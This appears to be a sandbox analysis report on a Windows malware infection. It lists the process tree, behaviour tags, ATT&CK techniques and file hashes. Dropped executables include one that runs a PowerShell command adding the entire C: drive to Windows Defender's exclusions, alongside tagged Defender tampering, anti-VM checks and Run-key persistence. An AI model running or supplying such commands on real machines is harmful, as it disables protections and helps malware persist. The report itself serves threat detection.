C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3868 -prefsLen 25164 -prefMapHandle 3872 -prefMapSize 270279 -jsInitHandle 3876 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3884 -initialChannelId {483e6d7f-37fe-488c-9fcb-ea68fbada469} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4032 -prefsLen 27276 -prefMapHandle 4036 -prefMapSize 270279 -ipcHandle 4120 -initialChannelId {2e40df72-378d-40f7-8b6c-0bd9c6f573ef} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:4608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4400 -prefsLen 34775 -prefMapHandle 4404 -prefMapSize 270279 -jsInitHandle 4408 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4416 -initialChannelId {e8bb763e-7b29-4022-a536-2bfbb03ce10d} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:3596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5072 -prefsLen 35012 -prefMapHandle 5076 -prefMapSize 270279 -ipcHandle 5148 -initialChannelId {3a808171-5bb6-42cc-9ac4-cb874fd81804} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:5872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5520 -initialChannelId {1b79dda0-417f-449e-800e-d9eebbb0cd45} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:5948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5692 -prefsLen 32952 -prefMapHandle 5696 -prefMapSize 270279 -jsInitHandle 5700 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {d16f7bdd-3da9-4757-965a-b91f22a261f5} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:5960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5484 -prefsLen 32952 -prefMapHandle 5868 -prefMapSize 270279 -jsInitHandle 5872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5880 -initialChannelId {3937fd3d-df25-4399-98d9-5c91b197216a} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:5972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419580101\e5367c195a.exe"C:\Users\Admin\AppData\Local\Temp\10419580101\e5367c195a.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\10419590101\d11e195f79.exe"C:\Users\Admin\AppData\Local\Temp\10419590101\d11e195f79.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe"C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:264
-
-
C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5148 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:5156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4896 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:5792
-
-
-
-
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4b8 0x5101⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4344 -ip 43441⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3448
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1380
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:5292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:1720
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
7Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
896KB
MD5c0e32665e8a5f60adcdba4e9d3c58fbd
SHA156b1ae589373a3c5771980a31034d562e1697b37
SHA25683537194282e7f0053572cde038ec53ea25becb13d3da39cd03adcfbdb72fa5b
SHA512659dcc2b45c7ac87c1d78549699764b39e9bf61714d537fae8ea53b6da74f5313ad42052a8df7596cb236cd3c8f9c4c0c624adffa3cdf7bc501b6fe2ecf341d5
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
16KB
MD5e87c7a40d401a94cfadcee06ed882cfa
SHA1595d75a22e9701eb0613944ec223fdd84946265c
SHA256ec2b721ea142e7a353b3de65a9e9f44d41ea113a222a599820a9f1c74752d53d
SHA51295b759c48aa9fc363a781a19807d8adcc1d44c65b066ff572f2b3bddcd5e3b9b19804e9a55f08ebae8373a49a496609dca5aae5819bb254e69ecfe703e8c8934
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD5aab4766c30709f7189abe40d1229c621
SHA18fb3d67d11020758105f4422cd900a8f9e992589
SHA256951a80337653f21544bdb5300d13371c7c39f4a2d4ce06368365c34371263f2d
SHA512551c1ff90b4e10a6712de037e15e40025aaff9442f79b7e05ee19cabe17dfaeefba3657cff3c5e82b0fbfe195ee22633c360e803acfc26e36f7354c85b231624
-
Filesize
1.8MB
MD57b4c5fa52c698720d7d9e45ed2d7a711
SHA10242af88692e8fd8e1075a762ae13cf315385a6c
SHA256058476af0241212cf5ed6dd22bd2eba6ec72afea0364357fba9eb870f06c2368
SHA5122358ea5f1a59cbd7041872bb3ce349dda31a559d8a697cd20443bef825f33602b1b41123dd7cf37b6a1d7d9cac03fe17bb08be8651b30968e20b8a5e6c788327
-
Filesize
327KB
MD5fda2e2ddccb519a2c1fb72dcaee2de6f
SHA1efd50828acc3e182aa283c5760278c0da1f428a6
SHA256cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57
SHA51228c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf
-
Filesize
8.0MB
MD500ef7099fe1630a82aec7bf3e845c106
SHA181b6e7f72824216a02a06fa6abc828d2568fbc14
SHA256a87a6091b3f9e0f43f91f829ef4737b75fa608e0ffdd9f87ea98f2be3de6d1c9
SHA51259972541aff304e67c34cefdf536f608d3ee979066e8216bbcd361b0056a4febbef8f11e5941c52fd3e1c75b6860f0c6fd9aeee5faea3dd94babbc98c1429a62
-
Filesize
211KB
MD55c1bb6cac0b3da6e012442037cf62a64
SHA1f21a600e3c03309e485668481a2890e9a1f27180
SHA256d9d77d43ebceb7caf5bee3bf6ad57a608650da4c6542f6870943409c39e9fa7c
SHA512dd57ac222984c6e72f98b2c22f2f744692c9ba447f41be06a89de2f926b0ce2dad03aecd224df71d24751661ce481cbd7c6301810e5e149e0118d2d132b4aba1
-
Filesize
1.8MB
MD5e9f1a2e79b92504ccea1b8613bf9030e
SHA196740f8ea5e566ab39cf2eb7c01bda63b8cc7541
SHA2567f872c5918ee00e4e2cd4bf1adf505c01c6a661c9e8e326bc953a8e58674b7c5
SHA5122d3398d2c1965057d234c77a443f279e9fa9a210aac4fc8d0c7768d17f64531325c08210b36190a2cf00b8b6eb3b7ea2cbe6e87a3637ba70ce40d4a19c24fc9a
-
Filesize
4.5MB
MD582a660623656c064fb7a7598ff283512
SHA19962f734b944a3c60879d590d974db4eb85a41c5
SHA256579aa629ade38640ab1fb3f8c9e7a1c172062d4740fc797456803db12415ca51
SHA512e08d0a106869753789e2212c2eef998b56a20baf0080ceb9112eb6fa01e6e92751850fa2ee5e3a261adc30514f7b76bf2585dd0de3f3774011d06565d861f157
-
Filesize
4.3MB
MD5d7d5b2f460ab2a552ccd37ffe846f39a
SHA1a84bd114c44827a07e29a548211c769bfda274c2
SHA2565a19f74e5205b970c5f36c0c466f2f888412e14bf7f95b22856c4a7739e64eb1
SHA512502e408d9fd0fc15bcc23b8f958a96cd8f26306513802f30e6ee0dda985ce409cbf99c7ff2385002d2de1be005317b8cb011cecd0989fed0da58c59e8b771b7f
-
Filesize
2.0MB
MD569688177ed1baa1e21ebf5b8cc5d416e
SHA1eba68df7434baadb9a536f6cd7d66ff113a42ffa
SHA256b59e061f2ea5a7f4cdd2a5edeead169998f9a9ee959e51386051f69a518a263c
SHA51255fd5ea2b5fcfe6fa6bf79d3fe6e5a5e44e85a487d7709e4e5e047716aa33a9c6360491fe2d781f459ebe3d7e204cfd5cc751fc0eb9a11435fac959111e3d6cd
-
Filesize
2.4MB
MD56bcaa6f066af78f85f1106de1ea00031
SHA14981bdc7125f2460afc0b514241c785736d71268
SHA25627613cc4f4a71db26084707ad958d9e8228e654e4ea575dd1c0dc7bbb92845cd
SHA5121364694219b2730de483b201586da626889e36d661aa4c53b96e10baa5ee47c04f00e1779dec01335938538272bcc77a905f626f1a2f1e3a964c3b3d6972a96b
-
Filesize
950KB
MD5dcfce6257bd41af54060a4429662d291
SHA1b14fda486f0dcc3167432666aea136ef962f66bc
SHA2561a3be077f95f1f86b8efae98b20b07d389225860d31027d1f0638841475f7612
SHA512d8e6dd08a65a340dec6aa30f29e45990393c36d65372811108e754fdb4decc6f959abbd15bcd4a0cc1eb013c7fe3d6bcf42cb8672f3cd2681f032244b31b2842
-
Filesize
1.6MB
MD55fc1c5eb9a034468541060c199beeb32
SHA1d5f39e29fc056e56d62984a759bc396928cdcfd5
SHA25625ccf0acdb6d0d78422a25b800472e22d3e6f00e1a7a58ef51bd53c364541650
SHA5120148bafd450034dffe559d278211f7b5951d064866c446818f8d0fabfe8b887ea06fc5c08958811dc55481d88ca81039cafae36ee4c0932aecc53b101a0aa410
-
Filesize
2.1MB
MD58b7a6718ca74360fe9f51999563d5bd4
SHA1bba0641bc9c1360d8df011c5ad99d648536fd2a2
SHA256bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d
SHA5123b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
354KB
MD527f0df9e1937b002dbd367826c7cfeaf
SHA17d66f804665b531746d1a94314b8f78343e3eb4f
SHA256aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209
SHA512ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17
-
Filesize
1.2MB
MD518b6c58f5f099a577c2f322eba74d1e9
SHA111cf8353e6adcf12061b4afb95c63308bda399b2
SHA2562c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069
SHA5123f83df8396fe63f1a0cc1595b9923ebf879e69a24d4cff96cb4460b7143a3f2eaca99379f955af10ad06cc6d8a0fc2d846d40aaafcb258b4a4e6956de89d4d49
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502
-
Filesize
1KB
MD5e5ddb7a24424818e3b38821cc50ee6fd
SHA197931d19f71b62b3c8a2b104886a9f1437e84c48
SHA2564734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea
SHA512450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
717B
MD50998960ce092ea4f99eb501c1ae90513
SHA124e0038a5d0e8ae8fae795772a72d46935bec139
SHA2565cfcbd88042915c1733abdb480c0e0a27ad08c7e06671a8a031fe26f2e36181f
SHA51284e626727161f6389f952a7bc2773291a88ae259a5f30b86a453ba213f6f9e9958a2e55ac01ff82216c4abf2ec799ae9824d23fbee77af1f6e8cc92f244e6323
-
Filesize
768KB
MD5f87a45c8c5e4ba2e837262b2f7e7fc9b
SHA101c34e434bad7b0d790ca7c08a01dea3d6c33f0b
SHA25684ef2ae91bfacb8364617adf88a4c004dfaada41fcb8d33a907d374558f8d838
SHA5129c44de531184782dcc8cd46f8b84eb1118fdb70b3a0abd20d9865a4ee0be04a17b9780c7a8ffacbbe03af07519418ae3f557d61f1e4018249b09a7a3c0242500
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize17KB
MD528cb042bd85216383eb94a39d05593ef
SHA1057005a1db424785086f4f88ae9ae7eacbe2e0ac
SHA25683199449b9a315515ccc98326808b0ee3b54ad8b59aff2b78818e8599dd293ec
SHA51260633c499f6542fe184f6c7b3c39aac14d5afabce98a862d5009db1904fe2d7cf2963a62103809d977b3b0b1f9eb4cbc6af1f556e51e5094e32ce38ba5b23d33
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize8KB
MD57df49114f3fc64457eff737dc3fdce75
SHA18e9c178f48551d0acdd7fd0d6edab2ef13feb798
SHA2567acf855c97568527a3a6c04be40b7165c8936808b49c191555d4d603f5e7477f
SHA512f425da4bdebe41ed504c4ef2b0793e29bc1e7d6004cddb821aaf127bf6982b56b7059534a34b9f44bb1ff20f9975e6ad97c91856caa9109be51b246229ba6cf6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD519962c84aec8e3aecb466c905f8eb344
SHA1e1694283db78d90685741e3a8a1a1d382155beb2
SHA256420eb7c1d46827b5877c432207225556e92aecb98c004e0a30c5f58f47db642f
SHA51257034cd4df58d9f87c3da0e71474237369b2649bea623e8a82015b570311f846077643eb0eeef8b0731d51da656783837f5af8106fe12d78aa300da2b52aa1d8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD504b6d88830a86eef984584a4f3993a28
SHA1ddcfc633b90984e6084a8be1c3ae5b40b646e2dc
SHA25650cc80479d78dc85f22fa7b6bfdda20490e2ed1deaed8f76859e89a3065cad00
SHA5124cec36a42496d76e8c0552d0f408e8ed5e6bb00d59ea7c4a05275489bac1a41cfe789a01908a13c08dc800c07b9e1ff686639b35080831ebeda16f19b955fe2e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\events\events
Filesize1KB
MD59f96f9f2ee6bcefa0673fec04422c080
SHA1ea4a6a786ab88444292f45fcf98ad966d8f0cfa7
SHA256e5bfe5d0a61621a5e2449c88e6b73eba2a7cf16d97544f9c637117ed74cc57ea
SHA512406831220eaa9143d9f76a77da860d2a3db27d37a8bcba52e9881c51a422012b346297f5544279eeb234b90bff5c7f6fac226e70b700b2fd7544e1ad45bac90a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\0594b2ab-8974-4831-811d-e91573e8e567
Filesize886B
MD554c1fb4ee3112b2ffdd570cf6c57300f
SHA1069bc40d8f845f24cc975a2ff1057738e24382a9
SHA25665647563edbea09f42482be4b52bb82a5da1e18d054722bf8b7561b5bece5dd3
SHA51292d77bb6853361fa4b9c541e644abe967962ae957b7dc98e6ae4ff69048c8efedd6e78985a4afe962b35f457c4c2401a8c76f39245f387b380b990fde21c60bc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\43811572-11a1-4204-ba4c-18afa1ba6318
Filesize16KB
MD5c960c9e743230858f0e8b197491b68fa
SHA174ed8c80a08c42a300545d8c7320562e51245548
SHA256f9dfbf1db4143af30ba76a7aadfe350e9397895c2753b4574a8ae0677d582434
SHA5127b7c49ba69f2c3362863fda7392330d490de82a111887263bd5e95136622fd97c483fc68f24aedfeca4f59d2ae2b5d76ec42bc25b248d060ac396933a19cdfc5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\579bfbc2-bf30-4919-bce6-5127d6b8b902
Filesize235B
MD587ffb925247b6a1fdd0d93edc17bc569
SHA1b640efeff2b95a60f6df25d4dc068588dc74cc6e
SHA25665e093bf8eb1cdabaf6b37447aa2ac4b28a5824cf500abfbd3a2c9cda92f15e9
SHA51207440bbe2e27a0c9e414de6d35d99b8bfac4606a64114f8fc9c9e44a9b0001ad711e0df76420d406efa6b42dc05a2965ef7d4008d3034891089b2035eb0bcce7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\641c6695-cb3c-4c7f-b2f7-2180a6f4d7a0
Filesize2KB
MD505cbeeee8d4a85defa061334c9174fbd
SHA109815058afb924d2da4c14738dc2d0ddbacffe86
SHA2565d9d16d8fb35182a1e6983559696b3818f42022bbc04e3c55290bfeea6a13f77
SHA5123feb377d28f51102c6eb4c317e47e33be231d96a3431a0c1163dfa314c242151306783d007caecc6825098dd333c28591ae733b635a3b10a68bf76e8b6748c15
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\79d66d53-66f9-4ddb-bc76-c9ce73a32750
Filesize883B
MD5117c41f430826e9f521ef6b3ae014315
SHA11e32305b05d282c62b8248b1caf57f950f95b1c8
SHA256240d790e1b8297181d997991152dc71c14f5a584677dd3ea0f1a04a4ae060dce
SHA5123f853bcd5cf95adeaf94b87002c4be1b96bae93f5a85c98d4282a5f32b1a0de1e4a387593d8c695594ca6e3a91615634aca308fd066f1eedb87ca1fc3e3aab0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\7a364a3f-e6a8-4b6d-8261-001717d08519
Filesize235B
MD57771fc76ccd965fa02cd8ac64038e075
SHA11cab6b210cb2a930461c3a0f2d78b75cce96598c
SHA25634725aa24353c2eb17f168ff446d1a7b693a5628979924bb738b34c1921d31b6
SHA5124fbf4676b40af58e3465b1be85b3ce8a0c7c3a86cb1276e0b508f854df50e59781fbf5197f14c6c4fb570e48bad22d0b1f8b8b9e3eaecd1887ef465a0fccf1ba
-
Filesize
16KB
MD5d0672a93f04efd4b3a1749d833124be2
SHA1f1384cddb98c87c00515240aa10585e39693b999
SHA256130217b768a418358c925fdeb1f64f36fb98e25dd67423b6b5b3ab1ee95ec28d
SHA5124097a0edef0c63e1e33cc280c7105f575c00534cee1010f3e5da8783ff1fa885be8f4513ec350b80651aa9484a5c9bb99ce2d3c9007c6dc1aaa0eb15ca44dee0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
